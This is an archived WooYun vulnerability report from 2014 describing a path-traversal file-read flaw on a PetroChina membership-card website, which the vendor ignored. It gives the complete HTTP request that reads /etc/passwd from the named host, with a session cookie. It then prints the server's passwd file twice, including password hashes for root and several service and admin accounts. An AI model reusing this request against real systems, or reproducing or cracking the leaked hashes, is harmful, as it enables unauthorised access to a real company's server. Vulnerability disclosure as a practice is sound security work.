漏洞概要关注数(1)关注此漏洞

漏洞概要
关注数(
1
)
关注此漏洞
缺陷编号：
WooYun-2014-85491
漏洞标题：		中石油某站存在任意文件读取
相关厂商：
中国石油天然气集团公司
漏洞作者：
路人甲
提交时间：		2014-12-01 20:38
公开时间：		2014-12-06 20:40
漏洞类型：		任意文件遍历/下载
危害等级：		高
自评Rank：		15
漏洞状态：		
															漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源：
http://www.wooyun.org
Tags标签：
任意文件读取利用
0
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-12-01：	细节已通知厂商并且等待厂商处理中
2014-12-06：	厂商已经主动忽略漏洞，细节向公众公开
简要描述：
.。。。。。。
详细说明：
code 区域
GET /d/download/?fileName=../../../etc/passwd HTTP/1.1
Referer: http://vipcard.petrochina.com.cn:80/
Cookie: JSESSIONID=0000qxjZ61Nwj39N7iOFeTVqcVj:14png122d
Host: vipcard.petrochina.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
root:25xCUpju5eo8U:0:3::/:/sbin/sh
daemon:*:1:5::/:/sbin/sh
bin:*:2:2::/usr/bin:/sbin/sh
sys:*:3:3::/:
adm:*:4:4::/var/adm:/sbin/sh
uucp:*:5:3::/var/spool/uucppublic:/usr/lbin/uucp/uucico
lp:*:9:7::/var/spool/lp:/sbin/sh
nuucp:*:11:11::/var/spool/uucppublic:/usr/lbin/uucp/uucico
hpdb:*:27:1:ALLBASE:/:/sbin/sh
nobody:*:-2:-2::/:
www:*:30:1::/:
smbnull:*:101:101:DO NOT USE OR DELETE - needed by Samba:/var/opt/samba/nologin:/bin/false
cimsrvr:*:102:102:WBEM Services:/var/opt/wbem:/sbin/sh
sfmdb:*:103:20::/home/sfmdb:/sbin/sh
sshd:*:104:103:sshd privsep:/var/empty:/bin/false
iwww:*:105:1::/home/iwww:/sbin/sh
owww:*:106:1::/home/owww:/sbin/sh
hpsmh:*:107:104:System Management Homepage:/var/opt/hpsmh:/sbin/sh
tftp:*:108:105:Trivial FTP user:/home/tftp:/usr/bin/false
was:2.8KQGG5whM92:200:200:websphere:/home/was:/sbin/sh
adm01:hgBBfl5PCSpLc:109:20::/home/adm01:/sbin/sh
jyzadm:V73v3HSO3v03k:110:20::/home/jyzadm:/bin/csh
opc_op:*:777:177:OVO default operator:/home/opc_op:/sbin/sh
漏洞证明：
code 区域
root:25xCUpju5eo8U:0:3::/:/sbin/sh
daemon:*:1:5::/:/sbin/sh
bin:*:2:2::/usr/bin:/sbin/sh
sys:*:3:3::/:
adm:*:4:4::/var/adm:/sbin/sh
uucp:*:5:3::/var/spool/uucppublic:/usr/lbin/uucp/uucico
lp:*:9:7::/var/spool/lp:/sbin/sh
nuucp:*:11:11::/var/spool/uucppublic:/usr/lbin/uucp/uucico
hpdb:*:27:1:ALLBASE:/:/sbin/sh
nobody:*:-2:-2::/:
www:*:30:1::/:
smbnull:*:101:101:DO NOT USE OR DELETE - needed by Samba:/var/opt/samba/nologin:/bin/false
cimsrvr:*:102:102:WBEM Services:/var/opt/wbem:/sbin/sh
sfmdb:*:103:20::/home/sfmdb:/sbin/sh
sshd:*:104:103:sshd privsep:/var/empty:/bin/false
iwww:*:105:1::/home/iwww:/sbin/sh
owww:*:106:1::/home/owww:/sbin/sh
hpsmh:*:107:104:System Management Homepage:/var/opt/hpsmh:/sbin/sh
tftp:*:108:105:Trivial FTP user:/home/tftp:/usr/bin/false
was:2.8KQGG5whM92:200:200:websphere:/home/was:/sbin/sh
adm01:hgBBfl5PCSpLc:109:20::/home/adm01:/sbin/sh
jyzadm:V73v3HSO3v03k:110:20::/home/jyzadm:/bin/csh
opc_op:*:777:177:OVO default operator:/home/opc_op:/sbin/sh
修复方案：
啥也不说了，你们应该了解。
版权声明：转载请注明来源
路人甲
@
乌云
漏洞回应
厂商回应：
危害等级：无影响厂商忽略
忽略时间：2014-12-01 20:38
厂商回复：
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分